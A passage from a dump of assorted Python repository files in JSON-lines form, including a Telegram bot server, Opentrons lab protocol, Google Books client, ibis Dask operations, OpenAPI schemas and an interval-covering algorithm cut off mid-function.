#self.free()\n\n    async def send_message(self,message):\n        #assert not self.lock\n        \n        t=datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'.json'\n        await self.bot.send_message(self.chat_id, message)\n        with open(join(self.path,'send_messages',t), 'w') as f:\n            json.dump({'chat_id': self.chat_id, 'message': message}, f)\n\n    async def add(self,message):\n        with open(self.save_path,'a') as f:\n            f.write(message+'\\n\\n')\n        #self.task.cancel()\n        \n        #if time.time()-self.last_out>self.buffer_time:\n        asyncio.create_task(self._hook())\n\n\n    async def done_gathering(self):\n        #await self.lock()\n        await self.lock()\n        #print('locked')\n        t=time.time()-self.last_out\n        await asyncio.sleep(self.buffer_time-t)\n        #print('woke')\n\n        if exists(self.save_path):\n            with open(self.save_path) as f:\n                message=f.read()\n            os.remove(self.save_path)\n        else: \n            message= ''  \n\n        self.last_out=time.time()\n        \n        self.free()\n        #print('free')\n        return message\n\n\n\n#def tel_main(tel,response,reminder,errored_reminder,start) -> None:\n    \"\"\"Start the bot.\"\"\"\n    #responder=Responder(response,reminder,errored_reminder,start)\ndef tel_main(tel,responder) -> None:\n    FolowUpCalls.set_func(responder.wrapped_reminder)\n\n    application = Application.builder().token(tel).post_init(responder.initialize_tasks).build()\n    \n    application.add_handler(CommandHandler(\"start\", responder.start))\n    application.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, responder.respond))\n    \n    application.run_polling(allowed_updates=Update.ALL_TYPES)\n\nif __name__ == \"__main__\":\n\n    #thread_count=0\n    print('started server')\n    with open('secrets') as f:\n        tel,ai=tuple(f.read().split('\\n'))[:2]\n\n    openai.api_key=ai\n    #self.user_threads = {} # this stores the callback threads  \n\n    async def response(bot,user_id,message):\n        #print(bot)\n        conv=Conversation_Manager.from_id(user_id,bot)\n        \n        await conv.add(message)\n\n        return 10,'2'\n\n    async def reminder(bot,user_id,notes:str):\n        #print(junk)\n        #print(bot)\n        conv=Conversation_Manager.from_id(user_id,bot)\n        \n        \n        m= await conv.done_gathering()\n        if m:\n            await conv.send_message(f'reminder got:\\n{m}')\n        await conv.send_message(f'reminder:\\n{notes}')\n        \n        secs=int(notes)\n        if secs>4:\n            ans=None  \n        else:\n            ans=str(2*secs)\n        return secs,ans\n\n    async def errored_reminder(bot,user_id,notes:str):\n        conv=Conversation_Manager.from_id(user_id,bot)\n        \n        #conv.task.cancel()\n        m= await 
conv.done_gathering()\n if m:\n await conv.send_message(f'found:\\n{m}\\n in memory')\n await conv.send_message(f'server error delayed response:\\n{notes}')\n\n secs=int(notes)\n if secs>4:\n ans=None \n else:\n ans=str(2*secs)\n return secs,ans\n #await send_message(bot,user_id,'server error delayed response:\\n'+notes) \n\n async def start(bot,user_id,user):\n await send_message(bot,user_id,f'hi {user.name}')\n\n responder=Responder(response,reminder,errored_reminder,start)\n print('tel server')\n tel_main(tel,responder)\n #tel_main(tel,start=start,response=response,errored_reminder=errored_reminder,reminder=reminder)","repo_name":"nevakrien/ai_secretary","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26508584679","text":"from django.urls import path\r\nfrom . import views\r\n\r\n\r\nurlpatterns = [\r\n path('invoiceupload/',views.invoice_upload,name='invoiceupload'),\r\n path('invoiceupdate/',views.invoice_update,name='invoiceupdate'),\r\n path('invoicecreate/',views.invoice_create,name='invoicecreate'),\r\n path('invoiceinfo/',views.invoice_info,name='invoiceinfo'),\r\n]","repo_name":"rishu9304/adcurate","sub_path":"invoice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1485451566","text":"import opentrons.execute\nfrom opentrons import protocol_api\n\n# Metadata (has to be placed in the main directory of the protocol api)\nmetadata = {\n 'protocolName': 'Preparing Immunostained hMSC Cells',\n 'author': 'Your Name',\n 'apiLevel': '2.7'\n}\n\ndef run(protocol: protocol_api.ProtocolContext):\n\n # Define labware\n plate_6_well = protocol.load_labware(\"corning_6_wellplate_16.8ml_flat\", \"11\")\n reagent_rack = protocol.load_labware(\"opentrons_24_aluminumblock_generic_2ml_screwcap\", \"10\")\n tiprack_200 = protocol.load_labware('opentrons_96_tiprack_300ul', '7')\n tiprack_300 = protocol.load_labware('opentrons_96_tiprack_300ul', '8')\n\n # Define pipettes\n p50 = protocol.load_instrument(\"p50_single\", \"left\", tip_racks=[tiprack_200])\n p300 = protocol.load_instrument(\"p300_single\", \"right\", tip_racks=[tiprack_300])\n\n # Define reagents\n fixative_solution = reagent_rack.wells_by_name()['A1']\n permeabilization_solution = reagent_rack.wells_by_name()['B1']\n blocking_solution = reagent_rack.wells_by_name()['C1']\n primary_antibody_solution = reagent_rack.wells_by_name()['D1']\n secondary_antibody_solution = reagent_rack.wells_by_name()['A2']\n\n # Perform the experiment\n for i in range(1, 7):\n well = plate_6_well.wells_by_name()[f\"A{i}\"]\n\n # Fixation step\n p300.pick_up_tip()\n p300.aspirate(200, fixative_solution)\n p300.dispense(200, well)\n p300.blow_out(well.top())\n p300.drop_tip()\n\n protocol.delay(minutes=15) # Fixation time (can be adjusted)\n\n # Washing steps (repeat 3 times)\n for wash_round in range(3):\n # Remove fixative solution\n p300.pick_up_tip()\n p300.aspirate(200, well)\n p300.dispense(200, fixative_solution)\n p300.blow_out(fixative_solution.top())\n p300.drop_tip()\n\n # Add permeabilization solution\n p300.pick_up_tip()\n p300.aspirate(200, permeabilization_solution)\n p300.dispense(200, well)\n p300.blow_out(well.top())\n p300.drop_tip()\n\n protocol.delay(minutes=5) # Washing time (can be adjusted)\n\n # Remove permeabilization solution\n p300.pick_up_tip()\n 
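# draw the spent solution back out of the well before moving on to the blocking step\n        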
p300.aspirate(200, well)\n p300.dispense(200, permeabilization_solution)\n p300.blow_out(permeabilization_solution.top())\n p300.drop_tip()\n\n # Blocking step\n p300.pick_up_tip()\n p300.aspirate(200, blocking_solution)\n p300.dispense(200, well)\n p300.blow_out(well.top())\n p300.drop_tip()\n\n protocol.delay(minutes=60) # Blocking time (can be adjusted)\n\n # Primary antibody incubation\n p50.pick_up_tip()\n p50.aspirate(50, primary_antibody_solution)\n p50.dispense(50, well)\n p50.blow_out(well.top())\n p50.drop_tip()\n\n protocol.delay(minutes=120) # Primary antibody incubation time (can be adjusted)\n\n # Secondary antibody incubation\n p50.pick_up_tip()\n p50.aspirate(50, secondary_antibody_solution)\n p50.dispense(50, well)\n p50.blow_out(well.top())\n p50.drop_tip()\n\n protocol.delay(minutes=120) # Secondary antibody incubation time (can be adjusted)\n\n # Add your imaging step here if needed (e.g. loading samples into the imaging device)\n","repo_name":"labauto/Inagaki_2023_GPT4OT2","sub_path":"question_and_answer/tmp/tmp_9fc3163b-63a3-47e4-99a4-ad083ca7cd8a.py","file_name":"tmp_9fc3163b-63a3-47e4-99a4-ad083ca7cd8a.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"46611468558","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport requests\nfrom fuzzywuzzy import process as fuzz\nfrom fuzzywuzzy.fuzz import token_set_ratio\n\nfrom .. import exceptions\n\n\nGOOGLE_BOOKS_URL = 'https://www.googleapis.com/books/v1/volumes'\n\n\nclass GoogleBooksAPI:\n def __init__(self, match_threshold=70):\n self.match_threshold = match_threshold\n\n\n def _get_single_volume_from_results(self, data, search_str):\n \"\"\"\n Use fuzzywuzzy to reduce multiple search results down to a single one. 
Use class attrib\n `match_threshold` to determine valid fuzz matches.\n\n :params:\n data (list): list of dicts from Google Books API\n search_str (str): the author/title string searched for\n \"\"\"\n if len(data) == 1:\n return data[0]\n\n choices = {\n '{} {}'.format(' '.join(item['authors']), item['title']):item\n for item in data\n }\n results = fuzz.extract(search_str, choices.keys(), scorer=token_set_ratio)\n\n # abort if best match is below threshold\n if results[0][1] < self.match_threshold:\n raise exceptions.GoogleNoMatchesError\n\n # if more than one item shares highest matching rank, roll with first result\n if results[0][1] == results[1][1]:\n match = data[0]\n else:\n # use fuzzywuzzy comparison match\n match = choices[results[0][0]]\n\n return match\n\n\n def search_by_isbn(self, isbn):\n \"\"\"\n Search Google's Books API for a book by ISBN\n\n :params:\n isbn (str): ISBN 11 or 13\n \"\"\"\n params = {\n 'q': 'isbn:{}'.format(isbn),\n }\n return self._search(params)\n\n\n def search_by_author_title(self, author, title, retry=0):\n \"\"\"\n Search Google's Books API for a book by author/title pair\n\n :params:\n author (str): Book author\n title (str): Book title\n \"\"\"\n params = {\n 'q': 'intitle:{}+inauthor:{}'.format(title, author)\n }\n\n items = self._search(params)\n\n if len(items) == 1:\n return items[0]\n\n # extract best match from results\n return self._get_single_volume_from_results(items, '{} {}'.format(author, title))\n\n\n def _search(self, params):\n \"\"\"\n Search Google's Books API with the supplied query parameters\n\n :params:\n params (str): Search parameters\n \"\"\"\n resp = requests.get(GOOGLE_BOOKS_URL, params=params)\n if resp.status_code > 200:\n raise exceptions.GoogleHttpError\n\n items = []\n\n for item in resp.json()['items']:\n # subtitle is an optional field - concatenate with title and a colon\n subtitle = ''\n if item['volumeInfo'].get('subtitle'):\n subtitle = ': {}'.format(item['volumeInfo'].get('subtitle', ''))\n\n items.append({\n 'title': '{}{}'.format(item['volumeInfo']['title'], subtitle),\n 'authors': item['volumeInfo']['authors'],\n 'description': item['volumeInfo'].get('description'),\n 'publisher': item['volumeInfo'].get('publisher'),\n 'num_pages': item['volumeInfo'].get('pageCount'),\n 'link': item['volumeInfo']['canonicalVolumeLink'],\n 'image_url': item['volumeInfo']['imageLinks']['thumbnail'],\n 'average_rating': item['volumeInfo'].get('averageRating'),\n 'categories': item['volumeInfo'].get('categories'),\n 'identifiers': {\n 'id': item['id'],\n 'etag': item['etag'],\n }\n })\n\n return items\n","repo_name":"oii/ogreserver","sub_path":"ogreserver/sources/google_books.py","file_name":"google_books.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24247615650","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\n\npath_to_opensmile = '/Users/danielmora/opensmile'\npath_to_features = '/Users/danielmora/PycharmProjects/digit_recognizer/features/egemapsv01b'\npath_to_wav = '/Users/danielmora/PycharmProjects/digit_recognizer/wav'\n\nfor set in ['training', 'test']:\n for wav in os.listdir(os.path.join(path_to_wav, set)):\n # to extract different features, change .conf file\n command = f'/Users/danielmora/opensmile/SMILExtract \\\n -C /Users/danielmora/opensmile/config/egemaps/v01b/eGeMAPSv01b.conf \\\n -I {os.path.join(path_to_wav, set, wav)} \\\n -csvoutput {os.path.join(path_to_features, wav[:-3]+\"csv\")} 
\\\n -instname {wav[:-4]}'\n process = subprocess.run([command], shell=True)\n","repo_name":"melanchthon19/digit-recogniser","sub_path":"extract_features.py","file_name":"extract_features.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21817870456","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\n UTILITIES - util.py\n\n This file provides useful methods that don't relate\n to any specific class\n\"\"\"\n\n\nclass Util:\n \"\"\"Provides different utility methods\"\"\"\n\n @staticmethod\n def get_num_range(range_string, fill=False):\n \"\"\"Creates a integer list of a number range represented by\n a string and optionally fill it up with numbers\n\n Args:\n range_string (str): String representing number range\n fill (bool): Fill up middle values? (False)\n\n Returns:\n range (list): List representing number range\n \"\"\"\n # Split string and limit resulting list to max. two elements\n num_range = range_string.split('-')[:2]\n\n # Convert list elements to integer\n for i in range(len(num_range)):\n num_range[i] = int(num_range[i])\n\n # Fill list to at least two elements\n while len(num_range) < 2:\n # No element was given\n if not num_range[0]:\n # Add \"1\" as first one\n num_range.append(1)\n\n # Append first element again\n num_range.append(num_range[0])\n\n # Sort list\n num_range.sort()\n\n # Filling up\n if fill is True:\n _num_range = []\n\n for n in range(num_range[0], num_range[-1]+1):\n _num_range.append(n)\n\n num_range = _num_range\n\n return num_range\n","repo_name":"alexanderroidl/hydrabot","sub_path":"hydrabot_py/lib/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25663472760","text":"import random\nimport pathlib\n\nfrom qtpy import QtWidgets, QtCore, QtGui\n\n\n__here__ = pathlib.Path(__file__).parent\n\n\nclass Splash(QtWidgets.QLabel):\n def __init__(self):\n super().__init__()\n index = str(random.randrange(5)).zfill(3)\n path = str(__here__ / \"splash-images\" / f\"{index}.jpg\")\n self.pixmap = QtGui.QPixmap(path)\n\n def paintEvent(self, event):\n size = self.size()\n painter = QtGui.QPainter(self)\n point = QtCore.QPoint(0, 0)\n scaledPix = self.pixmap.scaled(\n size,\n QtCore.Qt.KeepAspectRatio,\n )\n # start painting the label from left upper corner\n point.setX((size.width() - scaledPix.width()) // 2)\n point.setY((size.height() - scaledPix.height()) // 2)\n painter.drawPixmap(point, scaledPix)\n","repo_name":"yaq-project/yaqc-qtpy","sub_path":"yaqc_qtpy/_splash.py","file_name":"_splash.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"28037933250","text":"from textwrap import dedent\n\nfrom rest_framework.schemas.openapi import AutoSchema\n\nfrom ._errors import error_responses\nfrom ._message import message_schema\nfrom ._message import message_with_id_schema\nfrom ._type_query import type_filter_parameter_schema\n\nboilerplate = dedent(\n \"\"\"\\\nProjects are the object under which all data in Tator is grouped, including user\naccess, metadata definitions, media, and annotations. 
Data does not cross boundaries\nbetween projects.\n\"\"\"\n)\n\n\nclass ProjectListSchema(AutoSchema):\n def get_operation(self, path, method):\n operation = super().get_operation(path, method)\n if method == \"POST\":\n operation[\"operationId\"] = \"CreateProject\"\n elif method == \"GET\":\n operation[\"operationId\"] = \"GetProjectList\"\n operation[\"tags\"] = [\"Tator\"]\n return operation\n\n def get_description(self, path, method):\n long_desc = \"\"\n if method == \"GET\":\n short_desc = \"Get project list.\"\n long_desc = \"Returns all projects that a user has access to.\"\n elif method == \"POST\":\n short_desc = \"Create project.\"\n return f\"{short_desc}\\n\\n{boilerplate}\\n\\n{long_desc}\"\n\n def get_path_parameters(self, path, method):\n return []\n\n def get_filter_parameters(self, path, method):\n return [\n {\n \"name\": \"organization\",\n \"in\": \"query\",\n \"required\": False,\n \"description\": \"Unique integer identifying an organization.\",\n \"schema\": {\"type\": \"integer\", \"minimum\": 1},\n },\n *type_filter_parameter_schema,\n ]\n\n def get_request_body(self, path, method):\n body = {}\n if method == \"POST\":\n body = {\n \"required\": True,\n \"content\": {\n \"application/json\": {\n \"schema\": {\"$ref\": \"#/components/schemas/ProjectSpec\"},\n \"example\": {\n \"name\": \"My Project\",\n \"summary\": \"First project\",\n },\n }\n },\n }\n return body\n\n def get_responses(self, path, method):\n responses = error_responses()\n if method == \"GET\":\n responses[\"200\"] = {\n \"description\": \"Successful retrieval of project list.\",\n \"content\": {\n \"application/json\": {\n \"schema\": {\n \"type\": \"array\",\n \"items\": {\"$ref\": \"#/components/schemas/Project\"},\n }\n }\n },\n }\n elif method == \"POST\":\n responses[\"201\"] = message_with_id_schema(\"project\")\n return responses\n\n\nclass ProjectDetailSchema(AutoSchema):\n def get_operation(self, path, method):\n operation = super().get_operation(path, method)\n if method == \"GET\":\n operation[\"operationId\"] = \"GetProject\"\n elif method == \"PATCH\":\n operation[\"operationId\"] = \"UpdateProject\"\n elif method == \"DELETE\":\n operation[\"operationId\"] = \"DeleteProject\"\n operation[\"tags\"] = [\"Tator\"]\n return operation\n\n def get_description(self, path, method):\n long_desc = \"\"\n if method == \"GET\":\n short_desc = \"Get project.\"\n elif method == \"PATCH\":\n short_desc = \"Update project.\"\n elif method == \"DELETE\":\n short_desc = \"Delete project.\"\n long_desc = dedent(\n \"\"\"\\\n Only project owners may delete a project. 
Note that deleting a project\n            will also delete all media and annotations within a project.\n            \"\"\"\n            )\n        return f\"{short_desc}\\n\\n{boilerplate}\\n\\n{long_desc}\"\n\n    def get_path_parameters(self, path, method):\n        return [\n            {\n                \"name\": \"id\",\n                \"in\": \"path\",\n                \"required\": True,\n                \"description\": \"A unique integer identifying a project.\",\n                \"schema\": {\"type\": \"integer\"},\n            }\n        ]\n\n    def get_filter_parameters(self, path, method):\n        return []\n\n    def get_request_body(self, path, method):\n        body = {}\n        if method == \"PATCH\":\n            body = {\n                \"required\": True,\n                \"content\": {\n                    \"application/json\": {\n                        \"schema\": {\"$ref\": \"#/components/schemas/ProjectUpdate\"},\n                        \"example\": {\n                            \"name\": \"New name\",\n                            \"summary\": \"New summary\",\n                        },\n                    }\n                },\n            }\n        return body\n\n    def get_responses(self, path, method):\n        responses = error_responses()\n        if method == \"GET\":\n            responses[\"200\"] = {\n                \"description\": \"Successful retrieval of project.\",\n                \"content\": {\n                    \"application/json\": {\n                        \"schema\": {\n                            \"$ref\": \"#/components/schemas/Project\",\n                        }\n                    }\n                },\n            }\n        elif method == \"PATCH\":\n            responses[\"200\"] = message_schema(\"update\", \"project\")\n        elif method == \"DELETE\":\n            responses[\"200\"] = message_schema(\"deletion\", \"project\")\n        return responses\n","repo_name":"cvisionai/tator","sub_path":"api/main/schema/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"52"} +{"seq_id":"32540624628","text":"import pandas as pd \n\ndf = pd.read_csv('titanic.csv', index_col = 'PassengerId')\nprint(\"Male:\", df['Sex'].value_counts()['male'])\nprint(\"Female:\", df['Sex'].value_counts()['female'])\n\nprint(\"Percent survived:\", sum(df[\"Survived\"])/ len(df[\"Survived\"]) * 100)\nprint(\"Percent of first class:\", df[\"Pclass\"].value_counts()[1]/ len(df[\"Pclass\"]) * 100)\n\nprint(\"Age avg:\", df[\"Age\"].mean())\nprint(\"Age median:\", df[\"Age\"].median())\n\n\nprint(df[['SibSp', 'Parch']].corr())\n\n\n\"\"\"\nFinding the most popular female name\n\"\"\"\nnames = list(df[df['Sex'] == 'female']['Name'])\nunique_names = {}\nfor name in names:\n    if '(' in name:\n        prep = name.split('(')[-1].split() \n        name = prep[:-1] + [prep[-1][:-1]]\n    else:\n        name = name.split('.')[1].split()\n    for n in name:\n        if n in unique_names:\n            unique_names[n] += 1\n        else:\n            unique_names[n] = 1\nunique_tuple = sorted([(v, k) for k, v in unique_names.items()], reverse=True)\nprint(unique_tuple[:5])\n\n","repo_name":"vlasove/mlds","sub_path":"voroncov/W1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24786215336","text":"from __future__ import annotations\n\nimport collections\nimport decimal\nimport functools\nimport numbers\n\nimport dask.dataframe as dd\nimport dask.dataframe.groupby as ddgb\nimport numpy as np\nimport pandas as pd\n\nimport ibis.expr.operations as ops\nfrom ibis.backends.dask.dispatch import execute_node\nfrom ibis.backends.dask.execution.util import make_selected_obj\nfrom ibis.backends.pandas.core import numeric_types\n\n\n@execute_node.register(ops.Negate, dd.Series)\ndef execute_series_negate(_, data, **kwargs):\n    return -data\n\n\n@execute_node.register(ops.Negate, ddgb.SeriesGroupBy)\ndef execute_series_group_by_negate(op, data, **kwargs):\n    return execute_series_negate(op, make_selected_obj(data), 
**kwargs).groupby(\n data.index\n )\n\n\ndef call_numpy_ufunc(func, op, data, **kwargs):\n if data.dtype == np.dtype(np.object_):\n return data.apply(\n functools.partial(execute_node, op, **kwargs),\n meta=(data.name, \"object\"),\n )\n return func(data)\n\n\n@execute_node.register(ops.Unary, dd.Series)\ndef execute_series_unary_op(op, data, **kwargs):\n op_type = type(op)\n if op_type == ops.BitwiseNot:\n function = np.bitwise_not\n else:\n function = getattr(np, op_type.__name__.lower())\n return call_numpy_ufunc(function, op, data, **kwargs)\n\n\n@execute_node.register(ops.Acos, dd.Series)\ndef execute_series_acos(_, data, **kwargs):\n return np.arccos(data)\n\n\n@execute_node.register(ops.Asin, dd.Series)\ndef execute_series_asin(_, data, **kwargs):\n return np.arcsin(data)\n\n\n@execute_node.register(ops.Atan, dd.Series)\ndef execute_series_atan(_, data, **kwargs):\n return np.arctan(data)\n\n\n@execute_node.register(ops.Cot, dd.Series)\ndef execute_series_cot(_, data, **kwargs):\n return 1.0 / np.tan(data)\n\n\n@execute_node.register(ops.Atan2, dd.Series, dd.Series)\n@execute_node.register(ops.Atan2, numeric_types, dd.Series)\n@execute_node.register(ops.Atan2, dd.Series, numeric_types)\ndef execute_series_atan2(_, y, x, **kwargs):\n return np.arctan2(y, x)\n\n\n@execute_node.register((ops.Ceil, ops.Floor), dd.Series)\ndef execute_series_ceil(op, data, **kwargs):\n return_type = np.object_ if data.dtype == np.object_ else np.int64\n func = getattr(np, type(op).__name__.lower())\n return call_numpy_ufunc(func, op, data, **kwargs).astype(return_type)\n\n\ndef vectorize_object(op, arg, *args, **kwargs):\n # TODO - this works for now, but I think we can do something much better\n func = np.vectorize(functools.partial(execute_node, op, **kwargs))\n out = dd.from_array(func(arg, *args), columns=arg.name)\n return out\n\n\n@execute_node.register(\n ops.Log,\n dd.Series,\n (dd.Series, pd.Series, numbers.Real, decimal.Decimal, type(None)),\n)\ndef execute_series_log_with_base(op, data, base, **kwargs):\n if data.dtype == np.dtype(np.object_):\n return vectorize_object(op, data, base, **kwargs)\n\n if base is None:\n return np.log(data)\n return np.log(data) / np.log(base)\n\n\n@execute_node.register(ops.Ln, dd.Series)\ndef execute_series_natural_log(op, data, **kwargs):\n if data.dtype == np.dtype(np.object_):\n return data.apply(\n functools.partial(execute_node, op, **kwargs),\n meta=(data.name, \"object\"),\n )\n return np.log(data)\n\n\n@execute_node.register(ops.Quantile, dd.Series, numeric_types, (dd.Series, type(None)))\ndef execute_series_quantile(op, data, quantile, mask, **_):\n if mask is not None:\n data = data.loc[mask]\n return data.quantile(q=quantile)\n\n\n@execute_node.register(ops.Quantile, ddgb.SeriesGroupBy, numeric_types, type(None))\ndef execute_series_quantile_group_by(op, data, quantile, mask, **_):\n raise NotImplementedError(\n \"Quantile not implemented for Dask SeriesGroupBy, Dask #9824\"\n )\n\n\n@execute_node.register(\n ops.MultiQuantile, dd.Series, collections.abc.Sequence, type(None)\n)\ndef execute_series_quantile_sequence(op, data, quantile, mask, **_):\n return list(data.quantile(q=quantile))\n\n\n# TODO - aggregations - #2553\n@execute_node.register(\n ops.MultiQuantile, ddgb.SeriesGroupBy, collections.abc.Sequence, type(None)\n)\ndef execute_series_quantile_groupby(op, data, quantile, mask, aggcontext=None, **_):\n def q(x, quantile):\n result = x.quantile(quantile).tolist()\n return [result for _ in range(len(x))]\n\n return aggcontext.agg(data, q, 
quantile)\n\n\n@execute_node.register(ops.Round, dd.Series, (dd.Series, np.integer, type(None), int))\ndef execute_round_series(op, data, places, **kwargs):\n    if data.dtype == np.dtype(np.object_):\n        return vectorize_object(op, data, places, **kwargs)\n    result = data.round(places or 0)\n    return result if places else result.astype(\"int64\")\n","repo_name":"ibis-project/ibis","sub_path":"ibis/backends/dask/execution/numeric.py","file_name":"numeric.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":3246,"dataset":"github-code","pt":"52"} +{"seq_id":"29899184424","text":"import os\n\nbook = {}\ncondition = True\nwhile condition:\n    name = input(\"Auctioneer name: \").lower()\n    money = int(input(\"Auctioning money :$ \"))\n    book[name] = money\n    ask = input(\"Do you have more Auctioneers? Yes/no \").lower()\n    if ask == 'yes':\n        condition = True\n        os.system('cls')\n    else:\n        condition = False\n        os.system('cls')\n\n# find the highest bidder rather than the last-entered name\nwinner = max(book, key=book.get)\n\nprint(f\"\\n\\nCongratulations {winner}, you win the auction with a bid of ${book[winner]}.\")\n","repo_name":"ShubhamOulkar/100_python_projects","sub_path":"Auction_program.py","file_name":"Auction_program.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"73102770084","text":"import wikipedia\nimport sys\nfrom wikipedia.exceptions import DisambiguationError\n\nWIKI_HOST = \"https://en.wikipedia.org\"\n\ndef search_results(q_term):\n    print(\"Searching for page: \" + q_term)\n    try:\n        page = wikipedia.page(q_term)\n        return [page.url]\n    except DisambiguationError as e:\n        page_list = [WIKI_HOST + p.get('href') for p in e.options]\n        return page_list\n\n\n","repo_name":"jamespeacock/wiki-search","sub_path":"wiki_search.py","file_name":"wiki_search.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72190983524","text":"import json\n\n\nclass Loading:\n    def __init__(self, models, result):\n        self.result = not int(result)\n        self.models_ids = list()\n        for x in models:\n            self.models_ids.append(int(x))\n\n\n    def __str__(self):\n        return \"Models:{0}, Result: {1}\".format(self.models_ids, self.result)\n\n\nclass Model:\n    def __init__(self, name, height, width, weight):\n        self.model_name = name\n        self.height = height\n        self.width = width\n        self.weight = weight\n    def __str__(self):\n        return \"{0}: height:{1}, width:{2}, weight:{3}\".format(self.model_name, self.height, self.width, self.weight)\n\n\ndef get_data():\n    file = open(\"./data\")\n    data = list()\n    for line in file.readlines():\n        data.append(Loading(list(line[:-5].split(' ')),line[-2:-1]))\n\n    return data\n\ndef get_models_info():\n    preferable_models = (33, 16, 10, 5, 4, 8, 11, 12, 1, 3, 15, 6, 13)\n    models_info = list()\n    file =json.load(open(\"./models_data\"))\n    for model_id in preferable_models:\n        info = file[model_id-1]\n        models_info.append(Model(info[\"brandName\"]+\" \" +info[\"name\"], info[\"height\"], info[\"width\"], info[\"weight\"]))\n\n\n    return models_info","repo_name":"HlibHlushko/LoadingMasterNN","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4918811640","text":"\"\"\"Drop collection arch fields\n\nRevision ID: 2176056cfb43\nRevises: 
4852a7975500\nCreate Date: 2016-05-23 10:55:31.312052\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2176056cfb43'\ndown_revision = '4852a7975500'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\ndef upgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.drop_column('collection', 'resolution_arches')\n    op.drop_column('collection', 'resolve_for_arch')\n    ### end Alembic commands ###\n\n\ndef downgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('collection', sa.Column('resolve_for_arch', sa.VARCHAR(), server_default=sa.text(u\"'x86_64'::character varying\"), autoincrement=False, nullable=False))\n    op.add_column('collection', sa.Column('resolution_arches', sa.VARCHAR(), server_default=sa.text(u\"'x86_64,i386'::character varying\"), autoincrement=False, nullable=False))\n    ### end Alembic commands ###\n","repo_name":"fedora-infra/koschei","sub_path":"alembic/versions/2176056cfb43_drop_collection_arch_fields.py","file_name":"2176056cfb43_drop_collection_arch_fields.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"52"} +{"seq_id":"73521779684","text":"\"\"\"\nA set of intervals {[a1, b1], ..., [an, bn]}; each interval lies within [0, 1]. Describe an algorithm that\nchecks whether the intervals can be chosen so that the whole interval [0, 1] is contained in the\nselected segments. The cover should consist of as few segments as possible.\n\"\"\"\n\n\n\"\"\"\nGreedy algorithm: sort the intervals by their first coordinate (O(nlogn)). Then check whether the first\ninterval starts at 0; if not, terminate the algorithm; if it does, remember the end of the current interval and examine\nthe following intervals. Among the intervals whose first coordinate is smaller than (or equal to) the second coordinate of the remembered interval,\nkeep the one whose second coordinate is largest, then remember that coordinate. Repeat the process; if \nduring the scan we do not encounter any such interval, the span cannot be covered (there is a gap\nbetween the intervals), and if the largest second coordinate found is smaller than the one we compare against, it likewise\nmeans that [0, 1] cannot be filled with these intervals.\n
The last remembered second coordinate should equal 1 for the function to return\ntrue.\nComplexity analysis: sorting O(nlogn), the scan and selection of intervals linear (n).\n\"\"\"\nfrom random import uniform\n\ndef filling_a_span(list):\n    n = len(list)\n\n    def quicksort1(Tab, p, r):\n        def quicksort(Tab, p, r):\n            while p < r:\n                q = partition(Tab, p, r)\n                quicksort(Tab, p, q - 1)\n                p = q + 1\n\n        def partition(Tab, p, r):\n            x = Tab[r][0]\n            i = p - 1\n            for j in range(p, r):\n                if Tab[j][0] < x:\n                    i += 1\n                    Tab[i], Tab[j] = Tab[j], Tab[i]\n            Tab[i + 1], Tab[r] = Tab[r], Tab[i + 1]\n            return i + 1\n\n        quicksort(Tab, p, r)\n\n    quicksort1(list, 0, n-1)\n    print(list)\n    if list[0][0] != 0:\n        return False\n\n    if list[0][1] == 1:\n        return True\n\n    max = 0\n    current = list[0][1]\n    counter = 1\n    result = [list[0]]\n    rem = []\n    for x in range(1, n):\n        # print(result, max, current, list[x])\n        print(result)\n        if list[x][0] <= current:\n            if list[x][1] > max:\n                max = list[x][1]\n                rem = list[x]\n        elif list[x][0] > current:\n            if max == 0:\n                return False\n            else:\n                current = max\n                result.append(rem)\n\n                if current == 1:\n                    return True, counter + 1, result\n\n                max = 0\n                if list[x][0] <= current:\n                    max = list[x][1]\n                    rem = list[x]\n                counter += 1\n\n    counter += 1\n\n    if max == 1:\n        result.append(rem)\n        return True, 